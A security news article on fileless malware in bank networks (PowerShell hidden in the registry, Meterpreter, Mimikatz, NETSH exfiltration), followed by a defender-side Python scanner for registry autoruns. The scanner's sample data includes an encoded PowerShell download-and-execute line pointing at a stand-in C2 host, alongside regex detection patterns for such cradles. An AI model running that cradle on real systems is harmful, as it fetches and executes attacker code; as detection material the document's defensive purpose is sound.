Previously associated with state-sponsored attacks like the Stuxnet worm, fileless malware is now going mainstream. According to upcoming Kaspersky Lab research, the networks of at least 140 banks have been infected by fileless malware that relies on an in-memory design to remain nearly invisible, as reported by Ars Technica.
Given how hard such attacks are to spot, the number of affected enterprises is most likely much higher than initially anticipated. The use of legitimate and widely deployed tools such as PowerShell, Metasploit and Mimikatz for the injection process makes detection almost impossible, researchers point out.
In a conversation with Ars Technica, Kaspersky Lab expert Kurt Baumgartner said that “what’s interesting here is that these attacks are ongoing globally against banks themselves”, adding that in most cases the banks haven’t been prepared effectively and can’t deal with these attacks. Things get even worse: the 140 unnamed organizations are scattered across 40 different countries, with the US, France, Ecuador, Kenya, and the UK being the five most targeted.
Unfortunately, Kaspersky researchers were not able to determine who is behind the attacks, or whether it is a single group or several competing ones. Why is that? Fileless malware, combined with command-and-control domains that carry no WHOIS data, makes attribution quite challenging, if not utterly impossible.
How Did Kaspersky Lab Come Across These Findings?
The fileless menace deployed against banks and enterprises was first discovered at the end of 2016. That is when an unnamed bank’s security team came across a copy of Meterpreter, an in-memory component of Metasploit, residing in the physical memory of a Microsoft domain controller, Ars Technica says. The team later concluded that the Meterpreter code had been downloaded and injected into memory using PowerShell commands. The compromised system also used Microsoft’s NETSH networking utility to move data to servers controlled by the attackers. Mimikatz was deployed as well, to obtain admin privileges.
Almost no evidence was left behind, because the attackers hid the PowerShell commands in the Windows registry. Some intact evidence did survive, on the domain controller. Researchers believe it was still there because the machine had not been restarted before Kaspersky began its examination. Eventually the researchers were able to recover the Meterpreter and Mimikatz code and determine that the tools were deployed to collect the passwords of system administrators and to remotely administer the infected hosts.
We’re looking at the common denominator across all of these incidents, which happens to be this odd use in embedding PowerShell into the registry in order to download Meterpreter and then carry out actions from there with native Windows utilities and system administrative tools.
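As an added defender-side example (not code from the article or from Kaspersky Lab), the following Python script reviews registry autorun entries for the pattern described above: PowerShell launched from the registry with a hidden window and a Base64-encoded command, which it decodes (PowerShell encodes these as UTF-16LE) so the analyst can read what would actually run. The registry entries are constructed sample data, and the key paths, value names and indicator labels are assumptions for illustration.

```python
import base64
import re

# Indicators a reviewer would look for in Run/RunOnce registry values, based on the
# technique described above: PowerShell started from the registry, hidden, with an
# encoded command that pulls a stage into memory, plus NETSH for moving traffic.
INDICATORS = (
    ("powershell launcher", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("download cradle", re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-Expression|\bIEX\b", re.I)),
    ("netsh usage", re.compile(r"\bnetsh\b", re.I)),
)

def decode_encoded_command(command):
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE in Base64), or None."""
    match = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", command, re.I)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_autoruns(entries):
    """entries: {registry_key: {value_name: command_line}} -> list of findings."""
    findings = []
    for key, values in entries.items():
        for name, command in values.items():
            decoded = decode_encoded_command(command)
            # Match against both the raw value and the decoded payload, so an encoded
            # download cradle is not missed just because it is Base64 in the registry.
            text = command if decoded is None else command + "\n" + decoded
            hits = [label for label, pattern in INDICATORS if pattern.search(text)]
            if hits:
                findings.append({"key": key, "value": name, "decoded": decoded, "indicators": hits})
    return findings

# Constructed sample data (not from a real host): one legitimate autorun and one that
# mirrors the registry-embedded PowerShell launcher described in the article.
_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/stage')"
_ENCODED = base64.b64encode(_STAGE.encode("utf-16le")).decode("ascii")
SAMPLE_ENTRIES = {
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run": {
        "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
        "Updater": f"powershell.exe -NoP -W Hidden -Enc {_ENCODED}",
    },
}

if __name__ == "__main__":
    for finding in scan_autoruns(SAMPLE_ENTRIES):
        print(f"{finding['key']}\\{finding['value']}: {', '.join(finding['indicators'])}")
        if finding["decoded"]:
            print("  decoded:", finding["decoded"])
```

On a live host the same logic applies to values exported from the Run/RunOnce keys (or collected by an autorun inventory tool), and a domain controller that has not rebooted since the suspected activity is where memory capture should happen first.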
As to how the attacks were initiated, nothing is concrete yet, but it is possible that SQL injection was used together with exploits targeting WordPress plugins. More details about the fileless malware attacks are expected in April, including how the infections were used to siphon money out of ATMs.